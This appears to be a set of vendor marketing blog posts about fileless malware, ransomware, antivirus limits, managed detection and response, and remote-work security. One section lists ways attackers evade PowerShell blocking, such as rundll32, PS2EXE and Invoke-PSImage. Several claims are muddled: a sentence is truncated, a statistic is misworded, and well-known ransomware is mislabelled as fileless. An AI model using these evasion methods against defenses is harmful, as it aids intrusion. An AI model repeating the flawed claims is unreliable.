Fileless Malware is one of the top cyber threats that can infiltrate your network and cause serious damage. Take a look at what hackers know about fileless malware and you should too.
What is Fileless Malware?
Fileless malware is malicious code that does not require using an executable file on the endpoint’s file system besides those that are already there. It is typically injected into some running process and executes in RAM. This makes it far more difficult for traditional AV and other endpoint security products to detect or prevent because of the low footprint and the absence of files to scan.
There are many ways to run code on a device without using executable files. These often utilize systems processes available and trusted by the OS.
A few examples include:
VBScript
Jscript
Batch files
PowerShell
Mshta and rundll32 (or other Windows signed files capable of running malicious code).
Another type of attack that is considered fileless is malware hidden within documents. Although such data files are not allowed to run code, there are vulnerabilities in Microsoft Office and PDF readers that adversaries can exploit to obtain code execution. For example, an infected document could trigger malicious PowerShell command. There are also a few built-in functionalities that allow code execution within documents, like macros and DDE.
How Does Fileless Malware Work?
Traditionally, AV and other endpoint security products have focused on files (executables) to detect and prevent malware. There are several advantages to this. Files can be hashed, queried in reputation services, examined by both static analysis and machine learning, and easily excluded for false detections.
But for many attackers, the name of the game is monetary gain: threat actors aim for cost-effectiveness, seeking the highest return for the least amount of effort. Yet the rewards for creating and delivering file-based malware diminish as soon as it ends up on public feeds. If the malware’s signature is detected two days after release, the attacker’s ROI (return on investment) may be significantly less than expected, or even negligible. Another reason fileless malware is compelling to threat actors is that security products cannot just block the system files or software utilized in these attacks.
Over the past few years, threat actors have increasingly turned to fileless malware as a highly effective alternative. Source
What Hackers Know About Fileless Malware
One of the reasons fileless malware is so compelling is that security products cannot just block the system files or software that are utilized in these kinds of attacks. For example, if a security admin blocked PowerShell, IT maintenance would suffer. The same applies to blocking Office documents or Office macros, which would likely have an even bigger impact on business continuity.
The lower footprint and lack of “foreign” executables to scan make it difficult for traditional AV and other endpoint security products to detect or prevent these kinds of attacks.
Enterprises understand that the lack of effective protection from fileless malware could leave their organization extremely vulnerable. As a result, security vendors came under pressure to address this growing threat and created all kinds of patches to claim (or demo) their “file-less attack” coverage. source
File-less Attacks
Fileless ransomware is a type of malware that does not rely on traditional file-based methods to infect a system. Instead, fileless ransomware uses malicious scripts or code that can be injected directly into memory or executed through legitimate application programs. This makes fileless ransomware more difficult to detect and remove, as there are no files left behind for security programs to scan and identify.
Fileless ransomware is often spread through phishing emails or malicious websites that exploit vulnerabilities in web browsers or other software programs. Once a system is infected, fileless ransomware can encrypt important files or steal sensitive information. In some cases, fileless ransomware can also give attackers remote access to an infected system.
There are a number of different attack vectors that can be used to launch a fileless ransomware attack. Some of the most common include:
Malicious scripts or code embedded in email attachments or websites
Exploits that take advantage of vulnerabilities in web browsers or other software programs
Infected USB drives
Social engineering techniques that trick users into running malicious code
Some recent examples of fileless-based attacks and exploits include Petya, WannaCry, Locky, and many more.
Fileless Malware Detection Techniques
Unfortunately, many of these attempts to solve the problem are less than ideal. Here are some of the common solutions, and why they are inadequate:
Blocking PowerShell – as noted above, PowerShell has become an essential tool for IT teams and has largely replaced Microsoft’s old cmd tool as the default command-line utility. Blocking it would cause severe disruption to IT teams. More importantly, from a defensive point of view, blocking it would be futile: there are other ways to use it that bypass the PowerShell.exe block. To name a few:
Run PowerShell with dlls only with a simple rundll32 command using PowerShell.
Convert PowerShell scripts into other EXE files with tools like PS2EXE
Use malware that utilizes its copy of PowerShell.exe or modifies the local PowerShell to avoid recognition of PowerShell by security products
Embed a PowerShell script in the pixels of a PNG file and generate a one-liner to execute it using Invoke-PSImage
Blocking MS Office macro files – in an attempt to eliminate this attack vector, Microsoft added an option to disable macros as a site setting (starting in Office 2016). However, most environments still allow them, so security vendors have mainly tackled this in two ways:
Block macros across the board – this enforces the same restrictions being offered by Microsoft for organizations that can do without
Extract the macro code for static analysis or reputation checks – This can work in some cases. However, the shortcoming of this approach is that such code is extremely difficult to classify and detect within a tolerable false positive rate, especially for never-seen-before malicious macros. In addition, very few repositories of benign and malicious code exist. Another option is looking for common functions typically found in attacks, but again these are variable and not widely cataloged.
Server-side detection – Some products use agent-side monitoring only and make the decision on the server or in the cloud. This approach has the same disadvantages as any detection that does not happen on the
What can be done to mitigate such attempts?
The key is to look at the behavior of processes executing on the endpoint rather than inspecting the files on the machine. This is effective because, despite the large and increasing number of malware variants, they operate in very similar ways. The number of malware behaviors is considerably smaller than the number of ways a malicious file might look, making this approach suitable for prevention and detection.
The behavioral approach is extremely good at detecting and preventing this type of attack because it is agnostic regarding the attack vector.
How to Detect Fileless Malware
Through our Managed Detection and Response service, Cybriant’s security team monitors all activities on the agent side at the kernel level to differentiate between malicious and benign activities. Since the agent already holds the full context: users, processes, command-line arguments, registry, files on the disk, and external communication, any malicious activity can be effectively mitigated completely. We can roll back all the bad deeds and allow the user to work on a clean device.
We help you waive the hidden costs of keeping your network clean from bad code, across your entire network.
To implement this approach effectively, Cybriant employs the concept of “Active Content”, which solves the problem of apportioning blame to the root cause of malicious activity.
For example, suppose a user downloads a malicious attachment via Outlook, which then tries to encrypt files on the disk. In this scenario, blaming and quarantining Outlook as the parent process would miss the true source of malicious activity. Instead, Outlook should be included as the source for forensic data to show but not mitigate against. You do, however, wish to mitigate the entire threat group, regardless of any additional files dropped, registry keys created, or any other harmful behavior.
Using Active Content lets us determine — and point the blame towards — the root cause of a given malicious flow, with or without a file, and allows the customer to handle the incident accurately. Source
Managed Detection and Response services have become vital in this ‘work from home’ age. For many employees, working from home has boosted productivity and employee morale. It has also boosted security concerns for many IT departments.
Since many organizations may have to deal with a remote workforce for an undetermined amount of time, it’s important to consider Managed Detection and Response services to protect your organization’s data.
What is Managed Detection and Response?
MDR is an outsourced managed security service that provides advanced protection on endpoints. MDR provides more advanced and deeper detection plus the ability to stop malware in its tracks. Typically, MDR uses AI and machine learning for deeper security analysis.
According to Gartner, Managed detection and response (MDR) providers deliver 24/7 threat monitoring, detection, and lightweight response services to customers leveraging a combination of technologies deployed at the host and network layers, advanced analytics, threat intelligence, and human expertise in incident investigation and response. MDR providers undertake incident validation, and can offer remote response services, such as threat containment, and support in bringing a customer’s environment back to some form of “known good.”
MDR service providers, like Cybriant, typically focus on threat detection and analytics. Automation is used in our MDR technology, but experienced experts are required to watch that technology on a 24/7 basis. Plus, MDR from Cybriant is all about Remediation…not just Response.
What is MDR Technology?
Our security platform uses artificial intelligence to track and contextualize every single activity on your computer systems. The Cybriant security platform will pinpoint malicious acts in real time and automatically stop them in their tracks before they become a threat.
When your team works remotely, you’re open to new threats, from the smart TV to the connected printer, and everything in between. Protect your workforce from every avenue of attack with Cybriant MDR.
Malware doesn’t need a connection to attack, and neither should your cybersecurity. Cybriant delivers Online/Offline Protection across any platform or OS—because if your security only works online, it doesn’t work.
Plus, with Cybriant’s team of security analysts watching your network 24/7, you’ll always be protected.
It’s reasonable to assume that around 30% of the population remains working from home.
So it makes sense to adopt the best remote working technology practices now so that when things do return to normal, your business is set to reap these benefits and have accelerated growth.
The right system tools and hardware play a big part in enabling a happy and productive remote workforce.
Even before the COVID-19 pandemic. Then, the majority of companies transitioned to remote work, if temporarily. It’s made the viability of a remote workforce plain.
Research into the likelihood that different occupations could work remotely going forward found:
34% of American jobs could “plausibly be performed from home”;
Up to 29% of Argentinians and 34% of Uruguayan workers are in occupations doable remotely;
In Europe, the same holds for 24% of workers in Italy, 28% in France, 29% in Germany, 25% in Spain, and 31% in Sweden and the UK.
When employees work from home, they face unknown threats and new attack surfaces. Managed Detection and Response services will protect most of the endpoints that your employees have access to.
#2. Ransomware Attacks Can Happen To You
Ransomware is a well-named type of cyberattack. Cybercriminals taking this approach to kidnap your data. After accessing your network, they encrypt files and demand payment for the passcode. Here are the top seven things you need to know about this business threat.
Cybercriminals rely on your false confidence. We’ve all been guilty of thinking, “it won’t happen to me.” All organizations, especially small to medium businesses, are targeted. Large enterprise organizations may have the resources they need to protect their networks, but mistakes are common in a DIY environment.
A common method to send out phishing emails in the hope of having people enter their access credentials. Targeted business communication emails work, too. The attacker gets to know your business first. Then they send an email impersonating a colleague, supplier, or customer asking you to take action or update contact details by clicking on the link or downloading a file.
In a recent article, we explained in depth the Top Ransomware Threats of 2020. Managed Detection and Response services are vital to prevent ransomware attacks from executing.
#2 Ransomware Spreads Fast
Ransomware is malware, malicious software that can reach a network. So, if Jane from accounting opens a ransomware file, every single computer on your business network could be infected. The virus can spread between businesses, too. Consider the debilitating WannaCry ransomware attack of 2017. Within four days of its first detection in Europe, the strain had spread to 116 countries.
Be prepared for more ransomware in 2021. Cybersecurity Ventures has predicted that, globally, businesses in 2021 will fall victim to a ransomware attack every 11 seconds, down from every 14 seconds in 2019. That figure is based on historical cybercrime figures. It is estimated that the cost of ransomware to businesses will top $20 billion in 2021 and that global damages related to cybercrime will reach $6 trillion. Yes, that is with a “T”.
#3. You Need 24/7 Coverage But Don’t Have The Resources
The cybersecurity skills shortage is one of the trends we can expect to see in 2021. It’s not easy to staff a security operations center (SOC) with skilled individuals, plus try staffing around the clock. You may have a team that is dedicated to your IT department, but they are also helping to support your business. Running a 24/7 SOC is our only business.
A recent study from (ISC)2 claimed the global security workforce needs to increase by a staggering 145% to cope with a surge in hiring demand. In Europe, this has come particularly in smaller companies with one-99 employees, as well as those with over 500 employees.
Unsurprisingly, over half (51%) of cybersecurity professionals said their organization is at moderate or extreme risk due to staff shortages.
#4. You Know You Need Threat Detection, but Do You Need a SIEM
Managed Detection and Response (MDR) and SIEM are different solutions but they are complementary to each other and work well together, especially in a managed solution – we have a service called PREtect that uses both as well as vulnerability management.
A SIEM that is performing at peak performance should outperform MDR in detection. Detection is the key to SIEM. It’s important to have a team that can help respond to any problem that is detected. A SIEM can be deemed pointless if it is only noise and you aren’t able to respond to any potential threats.
An MDR should outperform a SIEM in prevention. MDR is designed for endpoint prevention and analysis. But both MDR and SIEM require staff training, tuning, and maintenance
However, the distinctions between the two blur their common purpose and obscure the importance of a holistic cybersecurity platform in the enterprise network. Cybersecurity solutions perform optimally when they integrate effectively with each other and utilize their different capabilities.
#5. Cyberattacks Are Costly, Prevention Is Not
Once the ransomware is installed on your system, it locks down your files. To regain access to the files, you need the password or decryption key the attacker supplies when you pay up; that’s if they keep their end of the bargain once you pay the ransom. These are crooks you’re dealing with after all!
In Coveware’s analysis of Q3 2019, the average ransom payment increased by 13% to $41,198 as compared to $36,295 in Q2 of 2019. And that’s just the cost of the ransom. Indirect costs include the cost of downtime, lost revenue, and long-term brand damage. There’s also the expense of removing the ransomware, forensic analysis, and rebuilding systems.
The average ransomware attack in Q3 2019 resulted in 12.1 days of downtime. — Cover
Ransomware is a lucrative, relatively easy mode of attack for cybercriminals. They could target your business. Prevention in the form of Managed Detection and Response services is significantly less than the cost of dealing with a ransomware attack.
#6. You Can See What AntiVirus Has Missed
Many organizations are not comfortable removing their antivirus product completely. Very often, clients will utilize Managed Detection and Response (MDR) security services to determine just how much their current AV has missed. You’ll have the ability to detect and prevent hidden exploit processes that are more complex than a simple signature or pattern and evade traditional antivirus.
5 major cyber threats can make it through your antivirus. Read more here.
#7. AI-based Technology + Skilled Humans are an Excellent Combination
We write a lot about how antivirus isn’t enough to protect your endpoints anymore. When you combine AI-based technology with skilled security analysts that are watching your systems around the clock, you should feel confident that your remote workforce is secure.
Cybriant Managed Detection and Response Services
Our team of security experts will help stop advanced threats at the endpoint with Cybriant MDR. We utilize AI-based next-gen antivirus that will help you:
PREVENT: Our expert security analysts monitor and record all the events that occur on your endpoints. Our team focuses on relevant threats that attempt data exfiltration or modification. When files attempt to execute these suspicious processes an alert is triggered and the attack is halted in real-time.
DETECT: When a credible threat is detected, our system will retrieve the process history and our team will analyze the chain of events in real-time and determine the validity of the threat. You’ll receive alerts when threats are detected along with advice and insight from our cybersecurity team to help you mitigate and respond to the threat.
REMEDIATE: Once identified, the malicious activity is immediately stopped in its tracks, and our team guides you through the remediation. This remediation process provides astonishing insight into the data of the threat. You’ll be able to help your organization reduce its attack surface by learning how you’ve been compromised.
Conclusion
The global economy is slowly mending, yet it’s safe to say remote work is likely to remain part of the new business as usual. That means CIOs need to make changes to their tactics and find ways to ensure a secure organization even when they are working remotely. We recommend Cybriant MDR – Managed Detection and Response services.
If you depend on an antivirus, please be aware that it is more than likely to let you down. More importantly, some threatening cyber threats are well-known to get past antivirus and cause major problems.
This is How Your Antivirus is Letting You Down
The best way to avoid a computer virus is by using common sense, but that doesn’t mean you’ll be safe from attack. Even the most careful user can find themselves infected in an instant and spreading the virus faster than a sneeze during the flu season (or the coronavirus!). The common thought is that your antivirus will help you. However, we recommend a next-generation antivirus that can prevent malware from executing.
First of all, let’s discuss how your traditional antivirus is letting you down:
Advertising: Much like a free app making its fortune with in-app purchases, the free antivirus software will push for payment. Expect popup boxes pestering you to sign up for the paid version at least daily. Some free options will also try to change your browser home page and default search engine, an inconvenience you may be stuck with. Even paid will find ways to upgrade your service or protect something new.
Effectiveness: It’s fair to expect your antivirus to detect malware, and testing showed that in a head-to-head battle free and paid are about equal at catching known infections. And therein lies the kicker: generally speaking, an antivirus needs to have recorded a virus to its library before it can detect it. Next-gen antivirus uses AI and machine learning for deeper security analysis. It essentially bases the detection on suspicious behavior, source, and attributes, a far more effective method of detection.
Features: Free antivirus options are usually created from the paid version, taking out everything except the bare minimum. Some paid antivirus may form more secure protection against attacks. However, hackers have advanced beyond simple tactics and it’s not just about avoiding email attachments anymore.
Support: Free antivirus options are the most popular choice because they’re… free. Obviously. This also means there’s generally no support available. If there’s a problem or conflict with another program, you may find yourself without protection until it can be resolved. When coupled with our MDR service, next-gen antivirus offers 24/7 around-the-clock monitoring.
Cyber Threats That Will Make it Through Your Antivirus
You understand by now that your antivirus is letting you down. But, did you know that by relying on antivirus alone, you could potentially allow these common cyber threats onto your network, putting your corporate data at risk?
Advanced Threats. Legacy antivirus depends on prior knowledge to detect threats. Adversaries have access to nation-grade hacking tools which means that new threats are detected daily. AI- and computer learning give us the ability to detect and validate suspicious activity.
Polymorphic Malware. Attackers can easily defeat signature-based antivirus tools that rely on checking a file’s hash against a known hash database.
Malicious Documents. Sometimes a maliciously-formatted document is used to exploit vulnerabilities in the opening application to achieve code execution, and legacy AV cannot detect such by reputation.
Fileless Malware. Attackers have realized that traditional AV solutions have a gaping blindspot: malicious processes can be executed in-memory without dropping telltale files for AV scanners to find.
Encrypted Traffic. Malicious actors can hide their activities from inspection by ensuring that traffic between the victim and attackers’ command-and-control (C2) server is protected by end-to-end encryption.
Our team of security experts will help stop advanced threats at the endpoint with Cybriant MDR. We utilize AI-based next-gen antivirus that will help you:
PREVENT: Our expert security analysts monitor and record all the events that occur on your endpoints. Our team focuses on relevant threats that attempt data exfiltration or modification. When files attempt to execute these suspicious processes an alert is triggered and the attack is halted in real-time.
DETECT: When a credible threat is detected, our system will retrieve the process history, and our team will analyze the chain of events in real-time and determine the validity of the threat. You’ll receive the alerts when threats are detected along with advice and insight from our cybersecurity team to help you mitigate and respond to the threat.
REMEDIATE: Once identified, the malicious activity is immediately stopped in its tracks, and our team guides you through the remediation. This remediation process provides astonishing insight into the data of the threat. You’ll be able to help your organization reduce its attack surface by learning how you’ve been compromised.
Consider Cybriant MDR to help you detect threats that antivirus will certainly miss. Learn more here: cybriant.com/mdr.
As the news changes on an almost daily basis, it’s difficult to know what to expect after the pandemic. Here is a review of the existing threats and how your company can prepare for the world during and after the pandemic.
It is no secret that the COVID-19 pandemic is unprecedented health and economic crisis, affecting the wellbeing of employees. This pandemic has affected many businesses, as well as operations of businesses globally-but one that may have been overlooked by many is cybersecurity.
As a result of the coronavirus outbreak, cybercrimes have skyrocketed. Scammers are now launching fraudulent campaigns that cash in and feed off the cybersecurity gaps occasioned by emergencies and the necessity to adopt new working models.
In this post, we take a peek at the existing cyber threats, what to expect post the pandemic, and how your company can prepare for the inevitable. Let’s dig in:
Cybersecurity Risks in the COVID 19 Context
Some of the leading cyber crimes emanating from the COVID-19 crisis include:
Phishing attacks using the COVID-19 disease as bait
Fraudsters have been sending malicious emails impersonating government agencies and departments in charge of dispensing government-funded COVID-19 support initiatives. Such emails are usually designed to direct the recipient to a fake website where they are deceived to enter their personal and financial information.
Malware distribution using the pandemic as bait
Hackers have been leveraging human traits such as curiosity and concern around the coronavirus outbreak to deploy malware. In most cases, they send emails (with subject lines containing COVID-19-related phrases such as “Coronavirus Update”) that persuade the victim to download a malicious file from a website.
To create an impression of authenticity, the fraudsters spoof sender information in an email to make it look like it came from a trustworthy source, such as the World Health Organization (WHO).
Supply chain and remote working threats
As the pandemic ravages, governments have invoked several containment measures, such as social distancing and self/government-imposed quarantines, forcing companies to shift to remote working.
Fraudsters have taken advantage of this massive move to launch more attacks by exploiting various vulnerabilities in remote working tools. Since the recently deployed remote workers have had less training regarding the required security protections due to the current implementation rush, they are more prone to attacks.
Cybersecurity Risk Post-COVID 19
The COVID-19 outbreak is accelerating the trend towards telework, and we may see a more permanent shift towards telecommuting. As such, enterprises will continue facing the following challenges:
Telework will open multiple vectors for cyberattacks on employees due to increased use of personal devices and dependency on home and public networks.
Critical business assets will be at risk of being exposed to targeted and opportunistic cyberattacks by fraudsters and other malicious organizations seeking to exploit vulnerabilities and plant seed for possible future attacks.
Critical public sector services such as healthcare will continue to be under pressure and being hit hard with new types of ransomware, often aimed at disrupting connectivity and denial-of-service attacks.
Ransomware targeting supply-chains and online services will also be on the rise. Weakened organizations will be more vulnerable.
This begs the question: how will companies prepare for the inevitable?
A Robust Cybersecurity Response after COVID 19
Organizations will need to execute robust cybersecurity measures to prevent further crises. Beyond COVID-19, these seven areas will require attention.
#1. Teleworking solutions
Since we anticipate a permanent increase in telework, organizations should consider:
Procuring sufficient on-demand brandwidth to facilitate communication and content sharing, especially video conferencing across geographically dispersed sites.
Managing identity and access for remote staff to meet corporate security requirements as well as employees’ ease-of-use needs.
Deploying secure connectivity solutions to staff workstations such as internet protocol security (IPsec) – based VPN clients.
#2. External perimeter protection
Remote connections will undoubtedly increase an enterprise’s cyber-attack surface. Businesses may protect their external perimeters by:
Locking down staff workstations as well as company-based laptops with advanced security settings. This includes managing configurations centrally, and not giving administrative privileges to end-users.
Deploying network access control (NAC) as a solution that will help authenticate and validate devices, as well as enforce security policies before allowing them to connect to company networks.
Deploying solutions that enable remote endpoint data collection and analysis to help identify unauthorized activity.
#3. Cloud services
Cloud services offer many benefits over data storage and application hosting alternatives. Besides monitoring cloud usage within the enterprise, they enforce related cybersecurity policies and guard against malware. To enjoy these benefits cloud services need to be strategically adopted and managed. Companies should consider:
Adopting formal strategies for the use of cloud services.
Defining data storage regulations outlining the requisites for the use of cloud services, data center storage, and local storage, especially for crucial information.
#4. Secure collaboration tools
Video conferencing, email and office productivity tools have been very useful during the pandemic. Companies may choose to:
Adopt and use additional secure collaboration tools
Explore emerging technologies like virtual reality and chatbots for content delivery
#5. Cybersecurity policy
Organizations should consider conducting a risk assessment and establish enforcement mechanism such as:
Single sign-on
Automatic logout from unattended devices
Multi-factor authentication
# 6. Supply chain and third-party management
The pandemic may make it necessary for your supply chain associates to change their business model. Organizations should consider:
Reviewing third-party agreements -for instance, IT providers – to ascertain that they meet the latest requirements and have acceptable liability provisions.
Conducting regular cybersecurity audits for all third parties with authorized access to the company network, data, or systems.
#7. Cyber-attack financial protection and recovery
Companies should consider cyber insurance, which can come in handy as a cost-effective financial backstop should they experience a cyber-attack. Enterprises need to:
Review their current insurance coverage to identify potential gaps
Examine how emerging cybersecurity challenges may fit into the enterprise’s cyber risk transfer strategy
Examine possible changes in coverage terms and conditions at renewal. As insurers assess losses post-pandemic, they may change in claim patterns.
Consider MDR
In the midst of the pandemic, this monitored service for endpoints has become a priority for many organizations. Antivirus on endpoints is not enough to protect your corporate data. The fact is that cyberattacks on endpoints are increasing rapidly in complexity and numbers. MDR includes the ability to stop threats before they are able to do any harm. Plus with a team of security analysts watching your systems 24/7, we’ll help you remediate any issues that may occur.
The pandemic has brought a new era in cybersecurity and IT experts that will raise their game in protecting their companies during this crisis period will be crucial in the re-opening of the economy. Enterprise managers need to keep an eye on the medium and long term, recognizing that telecommuting may become the norm for a majority of the workforce long after the pandemic has ended.
While educating the remote workforce about cybersecurity best practices is a great move, it’s not enough. The cornerstone for success lies in deploying technologies that are effective and quick to adopt.
At Cybriant, we help brands like you implement strategies that will increase your breadth and depth of security protection rapidly.
White-collar workers have mostly shifted to working remotely from their own homes. Some enterprises facilitated remote work arrangements before the pandemic, but this mode of working is now the norm.
Here are six tips to make sure that your organization’s IT security defenses remain strong regardless of where your employees work from.
#1. Protect All Endpoints
Having the majority of your workforce working remotely leads to a large increase in the number of endpoint devices on your network. Whether your business opts to give employees company-certified laptops or you allow workers to connect to the network from their own devices, it’s imperative to protect these endpoints.
One option for endpoint protection is to use dedicated enterprise endpoint protection software and have it installed on every endpoint device. Another option is to mandate that employees have up-to-date anti-virus software installed on their devices before they can connect to the corporate network.
This can be overwhelming to IT departments, which is why we have created a service called Managed Detection and Remediation (MDR). MDR from Cybriant will help reduce the time between breach and detection, we can also help stop the threat before it can fully execute. Learn more here: cybriant.com/mdr.
#2. Properly Secure RDP Ports
It’s common for businesses to use remote desktop connections to give employees remote access to the same desktop workstation they would normally use on-premise. Remote workers can access remote desktops using the proprietary Remote Desktop Protocol (RDP). Cybercriminals frequently look for open RDP ports in an attempt to gain brute force access to remote desktops inside corporate networks.
To properly secure RDP ports, make sure that employees use strong passwords of at least 12 characters to connect to remote desktops. Another important step is to enable automatic updates so that any vulnerabilities in the remote access software are fixed as soon as patches become available.
Multi-factor authentication adds a layer of protection to your IT security environment on top of a strong password policy. With multi-factor authentication, employees can only gain access to systems if they give two or more pieces of identification while signing in. The most practical use of multi-factor authentication is to require a standard username and password combination in addition to a dynamic one-time passcode that only remains valid for one login session.
IT departments commonly regard employees as weak links in the context of evaluating enterprise IT risks. Remote work exposes employees to more IT security threats than usual, and it’s harder for enterprises to mitigate these threats.
A good way to protect employees against security threats while remote working is to promote awareness of the threats they face. Consider distributing an internal memo that identifies the main threats criminals use to gain access to networks, such as phishing and social engineering. You could also ask employees to repeat any IT security awareness training modules that your company offers.
While awareness is important, we prefer to go back to #1 – ensure the protection of endpoints. If you had a team of security experts watching your endpoints 24/7 – you can protect your corporate data no matter what. Learn more about MDR here: cybriant.com/mdr.
#5. Secure Your Video Conferences
Businesses need to maintain face-to-face communication and hold team meetings while people work from home. Video conferencing tools are popular choices for remote work, but this type of software can come with IT security risks.
It’s crucial to make an effort to secure all video conferences held by different teams and departments in your organization. Require passwords to gain access to video calls, and make sure your chosen tool has an alert feature that lets you know when someone new joins the conversation. You should also apply updates to your video conferencing software as soon as they are released.
#6. Protect Your Digital Assets
Your enterprise probably has many assets stored digitally on its network, including marketing materials, website content, illustrations, business plans, and presentations. A significant attack vector for hackers to gain access to valuable digital data is by stealing the credentials of an employee who has privileged access to more assets than they need for their daily work.
A vital measure to protect your digital assets is to enforce the least privilege controls on all user accounts. The principle of least privilege minimizes user access permissions to only the assets they need to perform their daily work.
The flexibility to work remotely some of the time was becoming an important part of what white-collar workers expected from enterprises. The COVID-19 pandemic rapidly altered the dynamics of remote work such that it is now the status quo. By following IT security best practices and tips for remote workers, you can ensure your corporate network and valuable assets remain protected in a new threat landscape.
Should you use an endpoint security service? The quick answer is yes, especially if your workers are accessing any corporate data on potentially unsecured endpoints. Read more about how this simple service could be your secret cybersecurity weapon.
I was recently reading over the Forbes article, “Why Securing Endpoints Is The Future Of Cybersecurity” with some very interesting insights from Verizon’s 2020 Data Breach Investigations Report (DBIR). According to the article:
Verizon’s DBIR reflects the stark reality that organized crime-funded cybercriminals are relentless in searching out unprotected endpoints and exploiting them for financial gain, which is why autonomous endpoints are a must-have today.
After reading the 2020 Verizon DBIR, it’s clear that if organizations had more autonomous endpoints, many of the most costly breaches could be averted. Autonomous endpoints that can enforce compliance, control, automatically regenerate, and patch cybersecurity software while providing control and visibility are the cornerstone of cybersecurity’s future.
For endpoint security to scale across every threat surface, the new hybrid remote workplace is creating an undeletable tether to every device as a must-have for achieving enterprise scale.
The lack of diligence around Asset Management is creating new threat surfaces as organizations often don’t know the current health, configurations, or locations of their systems and devices. Asset Management is a black hole in many organizations leading to partial at best efforts to protect every threat surface they have. What’s needed is more insightful data on the health of every device.
What is an Endpoint Security Service?
When you outsource your endpoint security service, you have a team of security analysts that monitor your endpoints 24/7 and filter out false positives. You’ll receive alerts when relevant threats are detected along with advice and insight from our cybersecurity to help you mitigate and respond to the threat.
MDR or Managed Detection and Remediation is what we have named our endpoint security service. As an extension of your team, our experts will investigate, triage, and remediate security events and provide executive-level reporting. Remediation may reveal dormant or trojan threat actors that evade network and endpoint detection solutions. Our MDR solution includes leveraging the talents of our experienced team as well as next-generation antivirus and EDR tools that utilize AI like SentinelOne.
The MDR service from Cybriant will allow you to protect your organization’s data and reduce your threat landscape against the most advanced threats.
What is an endpoint?
To put it simply, an endpoint is any device that communicates with the network to which it is connected. Here are some examples of endpoints:
Laptops
Desktops
Mobile Phones
Tablets
Servers
Virtual Environments
What is the goal of endpoint security?
According to Gartner, “Organizations investing in endpoint security tools are purposefully moving from an ‘incident response’ mentality to one of ‘continuous monitoring’ in search of incidents that they know are constantly occurring.”
Why do we need endpoint security?
Cybercriminals are leveraging advanced attack toolsets and techniques that can bypass most perimeter security solutions. The tools and techniques that cybercriminals use have outpaced the capabilities of many traditional endpoint security solutions as well. MDR is a cybersecurity technology that addresses the need for continuous monitoring and response to advanced threats.
What is the difference between endpoint security and antivirus?
Endpoint security differs from antivirus in that antivirus cover one single endpoint. Endpoint security covers your entire network and protects against security attacks.
Why outsource the monitoring of endpoint security?
While endpoint security is a powerful tool that addresses the need for continuous monitoring and response to advanced threats, this tool is often difficult to deploy, manage, and monitor particularly at scale in large to mid-sized organizations.
With Managed Detection and Remediation (MDR), you have a team of endpoint security experts not only utilizing next-generation tools on your behalf but are also feeding back information to your organization on how to respond to alerts. Cybriant’s security team brings together endpoint analysts, incident responders, forensics experts, and security engineers. They understand what normal endpoint activity should look like, when a more thorough investigation is required when to raise the alarm, and how to respond.
